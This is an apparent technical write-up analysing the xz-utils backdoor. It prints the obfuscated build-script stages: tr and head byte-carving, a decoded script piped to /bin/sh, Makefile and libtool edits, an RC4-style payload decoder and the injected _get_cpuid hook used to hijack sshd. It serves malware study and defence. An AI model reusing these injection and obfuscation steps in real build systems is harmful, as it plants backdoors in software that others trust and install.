<p>The <code>gl_[$1]_config</code> variable is defined with a command that performs data extraction and obfuscation removal on a file specified by <code>$gl_am_configmake</code>. It reads the file's contents using <code>sed</code>, appends a newline character, and pipes the output to <code>eval</code> with the <code>$gl_path_map</code> variable, which contains a <code>tr</code> command that performs character substitutions (likely to "uncorrupt" obfuscated data). The resulting output is then piped to a command specified by <code>$gl_[$1]_prefix</code> with the <code>-d</code> option, presumably for decompression or decoding. Any errors from this final command are suppressed by redirecting them to <code>/dev/null</code>. This process is designed to extract and execute a hidden, obfuscated script from the <code>tests/files/bad-3-corrupt_lzma2.xz</code> file during the build process.</p>
<pre><code class="lang-bash">gl_sed_double_backslashes=<span class="hljs-string">'s/\\/\\\\/g'</span>
gl_sed_escape_doublequotes=<span class="hljs-string">'s/"/\\"/g'</span>
gl_path_map=<span class="hljs-string">'tr "\t \-_" " \t_\-"'</span>
</code></pre>
<p>The next part of the exploit is on <a target="_blank" href="https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L95">Line 95</a> of the code, which defines the translation function (the <code>tr</code> call stored in <code>gl_path_map</code> above) used to de-obfuscate the <code>bad-3-corrupt_lzma2.xz</code> payload.</p>
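<p>To make the translation concrete, here is a minimal sketch that applies the same <code>tr</code> table to a made-up string. The <code>swap_chars</code> helper and the sample input are illustrative assumptions, not part of the backdoor.</p>
<pre><code class="lang-bash"># Same table as gl_path_map: tab and space trade places, as do '-' and '_'.
gl_path_map='tr "\t \-_" " \t_\-"'

# Hypothetical helper: run the table over stdin.
swap_chars() { eval "$gl_path_map"; }

printf 'a-b_c\n' | swap_chars                 # prints a_b-c
printf 'a-b_c\n' | swap_chars | swap_chars    # prints a-b_c again
</code></pre>
<p>Because the table only swaps pairs of bytes, applying it twice restores the input, so the same command can both "corrupt" and "uncorrupt" the data.</p>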
<hr />
<h3 id="heading-stage-2-bad-3-corruptlzma2xz">Stage 2 : <code>bad-3-corrupt_lzma2.xz</code></h3>
<p>Once the deobfuscation routine completes, we get the following bash script, which turns out to be yet another deobfuscation routine.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># retrieve the 'srcdir' path from config.status or a parent's config.status</span>
<span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f config.status; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> $(grep ^srcdir= config.status)
<span class="hljs-keyword">elif</span> <span class="hljs-built_in">test</span> -f ../../config.status; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> $(grep ^srcdir= ../../config.status)
    srcdir=<span class="hljs-string">"../../<span class="hljs-variable">$srcdir</span>"</span>
<span class="hljs-keyword">fi</span>

<span class="hljs-comment"># export a command sequence to variable 'i' for later evaluation</span>
<span class="hljs-built_in">export</span> i=<span class="hljs-string">"(\
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +724 \
)"</span>

<span class="hljs-comment"># process a compressed file, apply transformations, decompress, and execute as shell commands</span>
(
    xz -dc <span class="hljs-string">"<span class="hljs-variable">$srcdir</span>/tests/files/good-large_compressed.lzma"</span> | \
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span> | \
    tail -c +31265 | \
    tr <span class="hljs-string">"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"</span> <span class="hljs-string">"\0-\377"</span> \
) | xz -F raw --lzma1 -dc | /bin/sh
</code></pre>
<p>The script begins by evaluating the contents of the <code>config.status</code> file to extract the value of the <code>srcdir</code> variable, which likely represents the project's source directory. This step is essential for locating the required files and directories during the deobfuscation process.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">eval</span> `grep ^srcdir= config.status`
<span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f ../../config.status;<span class="hljs-keyword">then</span>
<span class="hljs-built_in">eval</span> `grep ^srcdir= ../../config.status`
srcdir=<span class="hljs-string">"../../<span class="hljs-variable">$srcdir</span>"</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>The next step is to define and export a variable <code>i</code> that holds a command string for selective byte extraction from a data stream; it is run later with <code>eval</code>. The string is a long chain of <code>head</code> commands that alternately skip and output bytes from the input.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> i=<span class="hljs-string">"((head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; ... &amp;&amp; head -c +724)"</span>
</code></pre>
<p>The chain starts by skipping the first 1024 bytes (<code>head -c +1024 &gt;/dev/null</code>), followed by outputting the next 2048 bytes (<code>head -c +2048</code>). This pattern repeats, alternating between skipping 1024 bytes and outputting 2048 bytes. The final <code>head</code> command outputs either 724 or 939 bytes, depending on the script version.</p>
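<p>The skip-and-keep idiom is easier to see at a small scale. The sketch below uses made-up sizes (skip 2 bytes, keep 3) and a hypothetical <code>skip_take</code> helper; it assumes GNU <code>head</code>, which consumes only the requested number of bytes from a pipe.</p>
<pre><code class="lang-bash"># Miniature of the chain: discard 2 bytes, emit 3, discard 2, emit 3.
i="( (head -c 2 &gt; /dev/null) &amp;&amp; head -c 3 &amp;&amp; (head -c 2 &gt; /dev/null) &amp;&amp; head -c 3 )"

# Hypothetical helper: run the chain over stdin, as the real script does with eval.
skip_take() { eval "$i"; }

printf 'xxAAAyyBBBzz' | skip_take    # prints AAABBB
</code></pre>
<p>Each <code>head</code> picks up the stream where the previous one stopped, so the junk bytes interleaved with the payload never reach the next stage.</p>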
<p>The main deobfuscation step is encapsulated in the following command. At the end of the pipeline, the decompressed and deobfuscated data is piped to the system's shell (<code>/bin/sh</code>) and executed.</p>
<pre><code class="lang-bash">(xz -dc <span class="hljs-variable">$srcdir</span>/tests/files/good-large_compressed.lzma|<span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span>|tail -c +31265|tr <span class="hljs-string">"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"</span> <span class="hljs-string">"\0-\377"</span>)|xz -F raw --lzma1 -dc|/bin/sh
</code></pre>
<p>The script decompresses the <code>tests/files/good-large_compressed.lzma</code> file using the <code>xz -dc</code> command. The decompressed output is then piped to <code>eval $i</code>, which runs the <code>head</code> chain stored in <code>i</code> and keeps only the selected byte ranges of the stream. That output is piped to <code>tail -c +31265</code>, which starts at byte 31,265 and therefore skips the first 31,264 bytes (or 31,232 bytes, depending on the version).</p>
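<p>The off-by-one in <code>tail -c +N</code> is easy to misread, so here is a tiny check with a made-up input. The <code>skip_prefix</code> helper is hypothetical.</p>
<pre><code class="lang-bash"># tail -c +N starts output at byte N (counting from 1), so N-1 bytes are dropped.
skip_prefix() { tail -c +"$1"; }

printf 'abcdef\n' | skip_prefix 3    # prints cdef: the first 2 bytes are skipped
echo $((31265 - 1))                  # prints 31264, the bytes skipped by the command above
</code></pre>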
<p>The remaining data is then passed through a <code>tr</code> command, which applies a fixed byte-substitution table (<code>"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"</code>), effectively a simple substitution cipher. The result is then decompressed as a raw LZMA1 stream by <code>xz -F raw --lzma1 -dc</code>.</p>
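<p>To see what the <code>tr</code> "key" does, the sketch below pushes the first byte of each source range through the table and prints the results in decimal. The <code>decode_bytes</code> helper is a hypothetical name, and the sample bytes are chosen purely for illustration.</p>
<pre><code class="lang-bash">key='\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131'

# Hypothetical helper: apply the substitution table and print decimal byte values.
decode_bytes() { LC_ALL=C tr "$key" '\0-\377' | od -An -v -tu1 | xargs; }

# Input bytes 5, 132, 42, 90, 0, 78 (written as octal escapes) start the six ranges.
printf '\005\204\052\132\000\116' | decode_bytes    # prints 0 37 161 197 239 244
</code></pre>
<p>The six ranges together cover all 256 byte values exactly once, so the table is a fixed permutation of bytes and can be undone by swapping the two <code>tr</code> arguments.</p>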
<p>The resulting script is the next piece of the code, and one of the beefier sections of the exploit outside of the main payload.</p>
<hr />
<h3 id="heading-stage-3-good-largecompressedlzma">Stage 3 : <code>good-large_compressed.lzma</code></h3>
<p>The final bash script from <code>good-large_compressed.lzma</code> is significantly more complex than the previous scripts, but in the end it's just another layer of deobfuscation with additional checks.</p>
<p>The script starts by performing a series of checks to ensure that the environment meets specific conditions.</p>
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f config.status; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$zrKcSS</span>
    <span class="hljs-built_in">eval</span> `grep ^LD=\<span class="hljs-string">'\/ config.status`
    eval `grep ^CC=\'</span> config.status`
    <span class="hljs-built_in">eval</span> `grep ^GCC=\<span class="hljs-string">' config.status`
    eval `grep ^srcdir=\'</span> config.status`
    <span class="hljs-built_in">eval</span> `grep ^build=\<span class="hljs-string">'x86_64 config.status`
    eval `grep ^enable_shared=\'</span>yes\<span class="hljs-string">' config.status`
    eval `grep ^enable_static=\'</span> config.status`
    <span class="hljs-built_in">eval</span> `grep ^gl_path_map=\<span class="hljs-string">' config.status`
    eval $zrKccj
    # ... (more checks follow)
fi</span>
</code></pre>
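<p>The code first checks for the existence of the <code>config.status</code> file, and then reads the values of various variables (e.g., <code>LD</code>, <code>CC</code>, <code>GCC</code>, <code>srcdir</code>, <code>build</code>, <code>enable_shared</code>, <code>enable_static</code>, <code>gl_path_map</code>) from it. Some of the <code>grep</code> patterns also pin the expected value: <code>LD</code> must start with <code>/</code>, <code>build</code> must start with <code>x86_64</code>, and <code>enable_shared</code> must be <code>yes</code>; otherwise the variable is simply not imported.</p>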
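<p>The <code>eval `grep ...`</code> idiom doubles as a filter: a variable is only imported when its line matches the pattern. A minimal sketch, using a made-up <code>config.status</code> fragment written to a temporary file (the file contents and the <code>load_gated</code> helper are assumptions for illustration):</p>
<pre><code class="lang-bash"># Hypothetical helper: import build and enable_shared only if they look as expected.
load_gated() {
    eval `grep ^build=\'x86_64 "$1"`
    eval `grep ^enable_shared=\'yes\' "$1"`
}

unset build enable_shared
cfg=$(mktemp)
printf '%s\n' "build='x86_64-pc-linux-gnu'" "enable_shared='no'" &gt; "$cfg"
load_gated "$cfg"
echo "build=${build:-unset} enable_shared=${enable_shared:-unset}"
rm -f "$cfg"
# prints build=x86_64-pc-linux-gnu enable_shared=unset
</code></pre>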
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f <span class="hljs-string">"<span class="hljs-variable">$srcdir</span>/debian/rules"</span> || <span class="hljs-built_in">test</span> <span class="hljs-string">"x<span class="hljs-variable">$RPM_ARCH</span>"</span> = <span class="hljs-string">"xx86_64"</span>; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$zrKcst</span>
    <span class="hljs-comment"># ... (more checks follow)</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>The code then checks if either the <code>debian/rules</code> file exists in the source directory (<code>$srcdir</code>) or if the <code>RPM_ARCH</code> variable is set to <code>x86_64</code>. This means that the target system must be x86-64, and the compilation process must be part of a Debian or RPM package build.</p>
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> (<span class="hljs-built_in">test</span> -f .libs/liblzma_la-crc64_fast.o) &amp;&amp; (<span class="hljs-built_in">test</span> -f .libs/liblzma_la-crc32_fast.o); <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$zrKcKQ</span>
    <span class="hljs-comment"># ... (more checks follow)</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>If the conditions are met and the script is running in the context of a Debian or RPM package build, it modifies the <code>src/liblzma/Makefile</code> file.</p>
<pre><code class="lang-bash">b=<span class="hljs-string">"am__test = <span class="hljs-variable">$U</span>"</span>  <span class="hljs-comment"># U is the 'bad-3-corrupt_lzma2.xz' file</span>
sed -i <span class="hljs-string">"/<span class="hljs-variable">$j</span>/i<span class="hljs-variable">$b</span>"</span> src/liblzma/Makefile || <span class="hljs-literal">true</span>

<span class="hljs-comment"># inject additional rules and variables</span>
h=<span class="hljs-string">"-Wl,--sort-section=name,-X"</span>
<span class="hljs-keyword">if</span> ! <span class="hljs-built_in">echo</span> <span class="hljs-string">"<span class="hljs-variable">$LDFLAGS</span>"</span> | grep -qs -e <span class="hljs-string">"-z,now"</span> -e <span class="hljs-string">"-z -Wl,now"</span> &gt; /dev/null 2&gt;&amp;1;<span class="hljs-keyword">then</span>
    h=<span class="hljs-variable">$h</span><span class="hljs-string">",-z,now"</span>
<span class="hljs-keyword">fi</span>
j=<span class="hljs-string">"liblzma_la_LDFLAGS += <span class="hljs-variable">$h</span>"</span>
sed -i <span class="hljs-string">"/<span class="hljs-variable">$L</span>/i<span class="hljs-variable">$j</span>"</span> src/liblzma/Makefile || <span class="hljs-literal">true</span>
</code></pre>
<p>These modifications include:</p>
<ul>
<li><p>Adding a reference to a corrupted test file (<code>bad-3-corrupt_lzma2.xz</code>) as a dependency</p>
</li>
<li><p>Injecting additional build rules and variables related to linker flags, object file dependencies, and environment variable exports</p>
</li>
<li><p>Modifying the linker flags to include options like <code>-z,now</code> (disabling lazy binding) and <code>-Wl,--sort-section=name,-X</code> (sorting sections by name and discarding temporary local symbols).</p>
</li>
</ul>
<p>The script also modifies the <code>libtool</code> script by replacing a specific pattern (<code>^pic_flag=\" -fPIC -DPIC\"$</code>) with a custom compilation flag (<code>-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections</code>).</p>
<pre><code class="lang-bash">sed -i <span class="hljs-string">"s/<span class="hljs-variable">$O</span>/<span class="hljs-variable">$C</span>/g"</span> libtool || <span class="hljs-literal">true</span>
<span class="hljs-comment"># O="^pic_flag=\" -fPIC -DPIC\"$"</span>
<span class="hljs-comment"># C="pic_flag=\" $P\"" (where P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections")</span>
</code></pre>
<p>If the script detects the presence of specific object files (<code>liblzma_la-crc64_fast.o</code> and <code>liblzma_la-crc32_fast.o</code>), it performs additional checks and then generates new versions of these object files. This process involves retrieving a compressed payload from the <code>good-large_compressed.lzma</code> file and then decompressing and decoding the payload using a modified version of RC4.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Decompress the input file using xz</span>
xz -dc <span class="hljs-variable">$top_srcdir</span>/tests/files/<span class="hljs-variable">$p</span> |

<span class="hljs-comment"># Run the head chain stored in $i to keep only the selected byte ranges</span>
<span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span> |

<span class="hljs-comment"># Convert each character to a separate line</span>
LC_ALL=C sed <span class="hljs-string">"s/\(.\)/\1\n/g"</span> |

<span class="hljs-comment"># Implement a modified RC4 algorithm</span>
LC_ALL=C awk
BEGIN {
    <span class="hljs-comment"># Set the field separator to newline and record separator to newline</span>
    FS=<span class="hljs-string">"\n"</span>; RS=<span class="hljs-string">"\n"</span>; ORS=<span class="hljs-string">""</span>

    <span class="hljs-comment"># Initialize variables</span>
    m = 256 <span class="hljs-comment"># Modulus value</span>
    <span class="hljs-keyword">for</span> (i = 0; i &lt; m; i++) {
        t[sprintf(<span class="hljs-string">"x%c"</span>, i)] = i <span class="hljs-comment"># Create a lookup table for characters</span>
        c[i] = ((i * 7) + 5) % m <span class="hljs-comment"># Initialize the state array</span>
    }
    i = 0; j = 0

    <span class="hljs-comment"># "Drop" RC4, discarding 4096 bytes of keystream</span>
    <span class="hljs-keyword">for</span> (l = 0; l &lt; 4096; l++) {
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        c[i] = c[j]
        c[j] = a
    }
}

<span class="hljs-comment"># Decoding loop</span>
{
    <span class="hljs-comment"># Lookup the character value</span>
    v = t[<span class="hljs-string">"x"</span> (NF &lt; 1 ? RS : <span class="hljs-variable">$1</span>)]

    <span class="hljs-comment"># Generate keystream bytes</span>
    i = (i + 1) % m
    a = c[i]
    j = (j + a) % m
    b = c[j]
    c[i] = b
    c[j] = a
    k = c[(a + b) % m]

    <span class="hljs-comment"># Apply the keystream with addition modulo 256</span>
    <span class="hljs-built_in">printf</span> <span class="hljs-string">"%c"</span>, (v + k) % m
} |

<span class="hljs-comment"># Decompress the output again using xz</span>
xz -dc --single-stream |

<span class="hljs-comment"># Skip the first $N bytes, then keep the next $W bytes</span>
((head -c +<span class="hljs-variable">$N</span> &gt; /dev/null 2&gt;&amp;1) &amp;&amp; head -c +<span class="hljs-variable">$W</span>) &gt; liblzma_la-crc64-fast.o || <span class="hljs-literal">true</span>
</code></pre>
<p>The pipeline starts by decompressing the input file with <code>xz -dc</code>: <code>-d</code> decompresses and <code>-c</code> writes the result to standard output. The decompressed data is then piped through <code>eval $i</code>, where <code>$i</code> is the <code>head</code> chain exported by the previous stage, so only the selected byte ranges are kept.</p>
<p>The output of the <code>eval</code> command is piped to <code>sed</code>, which appends a newline after every character using the <code>s/\(.\)/\1\n/g</code> command, so that each byte ends up on its own line. This step is necessary to prepare the data for the next stage, which is implemented using <code>awk</code>. The <code>awk</code> script implements a modified RC4 algorithm to decode the obfuscated data.</p>
<p>The <code>BEGIN</code> block initializes variables and prepares the RC4 state array. It creates a lookup table <code>t</code> to map characters to their corresponding byte values, and fills the state array <code>c</code> with the fixed formula <code>c[i] = (7 * i + 5) % 256</code> instead of running RC4's usual key schedule, so no secret key is involved.</p>
<p>The second <code>for</code> loop inside the <code>BEGIN</code> block "drops" the first 4096 bytes of the RC4 keystream by performing 4096 iterations of the state-update (swap) step without emitting any output.</p>
<p>For each input byte, the main decoding loop looks up its numeric value in the <code>t</code> lookup table, advances the RC4 state to produce one keystream byte <code>k</code>, and combines the two using addition modulo 256 instead of the usual XOR operation. The decoded byte is then printed to standard output.</p>
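<p>The keystream logic can be exercised without any binary data. The sketch below is a re-implementation for illustration, not the backdoor's code: it works on decimal byte values (one per line), and the <code>keystream_apply</code> name and its <code>sign</code> parameter are additions for this demo, so that the same routine can both encode (subtract the keystream) and decode (add it).</p>
<pre><code class="lang-bash"># keystream_apply SIGN: read decimal byte values (one per line) from stdin and
# print (value + SIGN * keystream) mod 256, one per line.
keystream_apply() {
    awk -v sign="$1" '
    BEGIN {
        m = 256
        for (i = 0; i &lt; m; i++) c[i] = (i * 7 + 5) % m   # fixed initial state, no key
        i = 0; j = 0
        for (l = 0; l &lt; 4096; l++) {                      # discard 4096 steps
            i = (i + 1) % m; a = c[i]; j = (j + a) % m
            c[i] = c[j]; c[j] = a
        }
    }
    {
        i = (i + 1) % m; a = c[i]; j = (j + a) % m; b = c[j]
        c[i] = b; c[j] = a
        k = c[(a + b) % m]                                 # one keystream byte per input byte
        v = ($1 + sign * k + m) % m
        print v
    }'
}

# Encode three made-up bytes by subtracting the keystream, then decode by adding it.
printf '%s\n' 104 105 33 | keystream_apply -1 | keystream_apply 1    # prints 104, 105, 33 (one per line)
</code></pre>
<p>Since the keystream depends only on the fixed initial state, anyone holding the script can decode the payload; the cipher here obscures the data rather than protecting it.</p>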
<p>The decoded output from the <code>awk</code> script is then piped back to <code>xz</code> with the <code>-dc --single-stream</code> options, which decompresses the data again. Finally, the script uses two <code>head</code> commands to skip the first <code>$N</code> bytes and keep the next <code>$W</code> bytes. The result is redirected to the file <code>liblzma_la-crc64-fast.o</code>.</p>
<pre><code class="lang-bash">xz -dc <span class="hljs-variable">$top_srcdir</span>/tests/files/<span class="hljs-variable">$p</span> | <span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span> | LC_ALL=C sed <span class="hljs-string">"s/\(.\)/\1\n/g"</span> | LC_ALL=C awk <span class="hljs-string">'...'</span> | xz -dc --single-stream | ((head -c +<span class="hljs-variable">$N</span> &gt; /dev/null 2&gt;&amp;1) &amp;&amp; head -c +<span class="hljs-variable">$W</span>) &gt; liblzma_la-crc64-fast.o || <span class="hljs-literal">true</span>
<span class="hljs-comment"># decompresses and decodes the payload from 'good-large_compressed.lzma'</span>

sed <span class="hljs-string">"/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()"</span> <span class="hljs-variable">$top_srcdir</span>/src/liblzma/check/crc64_fast.c | \
sed <span class="hljs-string">"/include \"crc_x86_clmul.h\"/a \\<span class="hljs-variable">$V</span>"</span> | \
sed <span class="hljs-string">"1i # 0 \"<span class="hljs-variable">$top_srcdir</span>/src/liblzma/check/crc64_fast.c\""</span> 2&gt;/dev/null | \
<span class="hljs-variable">$CC</span> <span class="hljs-variable">$DEFS</span> <span class="hljs-variable">$DEFAULT_INCLUDES</span> <span class="hljs-variable">$INCLUDES</span> <span class="hljs-variable">$liblzma_la_CPPFLAGS</span> <span class="hljs-variable">$CPPFLAGS</span> <span class="hljs-variable">$AM_CFLAGS</span> <span class="hljs-variable">$CFLAGS</span> -r liblzma_la-crc64-fast.o -x c -  <span class="hljs-variable">$P</span> -o .libs/liblzma_la-crc64_fast.o 2&gt;/dev/null
<span class="hljs-comment"># prepends a header, appends custom code, and compiles the modified crc64_fast.c</span>
</code></pre>
<p>The <code>$V</code> variable contains the malicious code injection. Specifically, the script rewrites the call to <code>is_arch_extension_supported()</code> in the <code>crc64_fast.c</code> and <code>crc32_fast.c</code> files so that it calls the malicious <code>_is_arch_extension_supported()</code> function, whose definition <code>$V</code> appends after the <code>crc_x86_clmul.h</code> include.</p>
<p>The <code>is_arch_extension_supported()</code> function is supposed to check if the CPU supports certain architecture extensions needed for optimized CRC computation. The xz-utils library contains optimized CRC implementations that take advantage of CPU-specific instructions like the <code>CLMUL</code> instruction set on x86 CPUs. The <code>is_arch_extension_supported()</code> function is used to dynamically determine if the optimized CRC implementations can be used or if the generic (non-optimized) implementations should be used instead.</p>
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> <span class="hljs-variable">$AM_V_CCLD</span><span class="hljs-variable">$liblzma_la_LINK</span> -rpath <span class="hljs-variable">$libdir</span> <span class="hljs-variable">$liblzma_la_OBJECTS</span> <span class="hljs-variable">$liblzma_la_LIBADD</span>; <span class="hljs-keyword">then</span>
    <span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> ! -f .libs/liblzma.so; <span class="hljs-keyword">then</span>
        mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || <span class="hljs-literal">true</span>
        mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || <span class="hljs-literal">true</span>
    <span class="hljs-keyword">fi</span>
    rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || <span class="hljs-literal">true</span>
<span class="hljs-keyword">else</span>
    mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || <span class="hljs-literal">true</span>
    mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || <span class="hljs-literal">true</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>After modifying the <code>crc64_fast.c</code> source file, the script compiles it together with the previously generated <code>liblzma_la-crc64-fast.o</code> file. The resulting object file (<code>.libs/liblzma_la-crc64_fast.o</code>) is then used to rebuild the <code>liblzma</code> library, which is the next level of the malware.</p>
<hr />
<h2 id="heading-the-backdoor-liblzmala-crc64-fasto">The Backdoor : <code>liblzma_la-crc64-fast.o</code></h2>
<p>A <code>.o</code> binary is an object file: it contains compiled machine code plus metadata (such as symbols and relocations) generated by the compiler, and it's not usually directly executable. These files need to be linked together to create an executable binary or a shared library.</p>
<p>The previous <code>good-large_compressed.lzma</code> script produces <code>liblzma_la-crc64-fast.o</code> and then links it into a shared library (<code>liblzma.so</code>) using the following linker command:</p>
<pre><code class="lang-bash"><span class="hljs-variable">$AM_V_CCLD</span><span class="hljs-variable">$liblzma_la_LINK</span> -rpath <span class="hljs-variable">$libdir</span> <span class="hljs-variable">$liblzma_la_OBJECTS</span> <span class="hljs-variable">$liblzma_la_LIBADD</span>
</code></pre>
<h3 id="heading-the-payload">The Payload</h3>
<p>The malicious code these object files contain gets incorporated into the final shared library <code>liblzma</code>. While OpenSSH itself doesn't use <code>liblzma</code>, many Linux distributions patch <code>sshd</code> to link against <code>libsystemd</code>, which depends on <code>liblzma</code>.</p>
<p>As explained earlier, the rebuild of <code>liblzma</code> compiles in the bits added to the <code>crc64_fast.c</code> source file, specifically the modified <code>_is_arch_extension_supported()</code> function, which calls the external <code>_get_cpuid()</code> function. That function is not part of the xz-utils codebase; instead, it is provided by the malicious object file (<code>liblzma_la-crc64-fast.o</code>) that the script injects into the build process.</p>
<p>Below is the original <code>is_arch_extension_supported()</code> function from the <code>crc_x86_clmul.h</code> header file.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">bool</span>
<span class="hljs-title">is_arch_extension_supported</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>
</span>{
    <span class="hljs-keyword">uint32_t</span> eax, ebx, ecx, edx;

    <span class="hljs-comment">/* Check if CPU supports CLMUL instruction set */</span>
    __get_cpuid(<span class="hljs-number">1</span>, &amp;eax, &amp;ebx, &amp;ecx, &amp;edx);
    <span class="hljs-keyword">return</span> (ecx &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">1</span>)) &amp;&amp; (ecx &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">9</span>));
}
</code></pre>
<p>The malicious script replaces this function with a custom <code>_is_arch_extension_supported()</code> function that calls the injected <code>_get_cpuid()</code> function instead:</p>
<pre><code class="lang-c"><span class="hljs-keyword">extern</span> <span class="hljs-keyword">int</span> _get_cpuid(<span class="hljs-keyword">int</span>, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*);

<span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">bool</span> _is_arch_extension_supported(<span class="hljs-keyword">void</span>) {
    <span class="hljs-keyword">int</span> success = <span class="hljs-number">1</span>; 
    <span class="hljs-keyword">uint32_t</span> r[<span class="hljs-number">4</span>];
    success = _get_cpuid(<span class="hljs-number">1</span>, &amp;r[<span class="hljs-number">0</span>], &amp;r[<span class="hljs-number">1</span>], &amp;r[<span class="hljs-number">2</span>], &amp;r[<span class="hljs-number">3</span>], ((<span class="hljs-keyword">char</span>*) __builtin_frame_address(<span class="hljs-number">0</span>))<span class="hljs-number">-16</span>);
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint32_t</span> ecx_mask = (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">1</span>) | (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">9</span>) | (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">19</span>);
    <span class="hljs-keyword">return</span> success &amp;&amp; (r[<span class="hljs-number">2</span>] &amp; ecx_mask) == ecx_mask;
}
</code></pre>
<p>Compared to the original function, it calls the malicious <code>_get_cpuid()</code> function instead of GCC's <code>__get_cpuid()</code> helper, and passes it an extra sixth argument derived from <code>__builtin_frame_address(0)</code>. It checks for an additional CPU feature flag (bit 19 of the <code>ecx</code> register) along with the <code>CLMUL</code> flags, but since <code>_get_cpuid()</code> is provided by the malicious binary, this call acts as the hook for backdooring <code>sshd</code>.</p>
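<p>For reference, the mask in the injected function can be reproduced with plain shell arithmetic. In CPUID leaf 1, ECX bit 1 is PCLMULQDQ, bit 9 is SSSE3, and bit 19 is SSE4.1; the <code>has_all_bits</code> helper and the sample values are hypothetical.</p>
<pre><code class="lang-bash">ecx_mask=$(( (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19) ))
printf '0x%x\n' "$ecx_mask"    # prints 0x80202

# Hypothetical helper: succeed only if every bit of the mask is set in $1.
has_all_bits() { [ $(( $1 &amp; ecx_mask )) -eq "$ecx_mask" ]; }

has_all_bits $(( 0x80202 | 0x1 )) &amp;&amp; echo "all three features present"
has_all_bits $(( 0x202 ))         || echo "SSE4.1 bit missing"
</code></pre>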
<p><code>is_arch_extension_supported</code> calls <code>__get_cpuid</code> (provided by GCC), but the backdoored build script modifies <code>crc64_fast.c</code> so it calls <code>_get_cpuid</code> instead, which is responsible for carrying out the primary malicious actions of the backdoor. One of the key malicious actions performed by <code>_get_cpuid()</code> is the modification of the Global Offset Table (GOT) and Procedure Linkage Table (PLT) of the process that loads the library.</p>
<p>Because <code>_get_cpuid()</code> is reached from an ifunc resolver, it runs when the library is loaded, which lets it modify the GOT and PLT to hijack the <code>RSA_public_decrypt()</code> function. This is achieved by exploiting the GNU indirect function (ifunc) mechanism, which allows for dynamic resolution of function implementations at runtime based on certain conditions, such as CPU capabilities.</p>
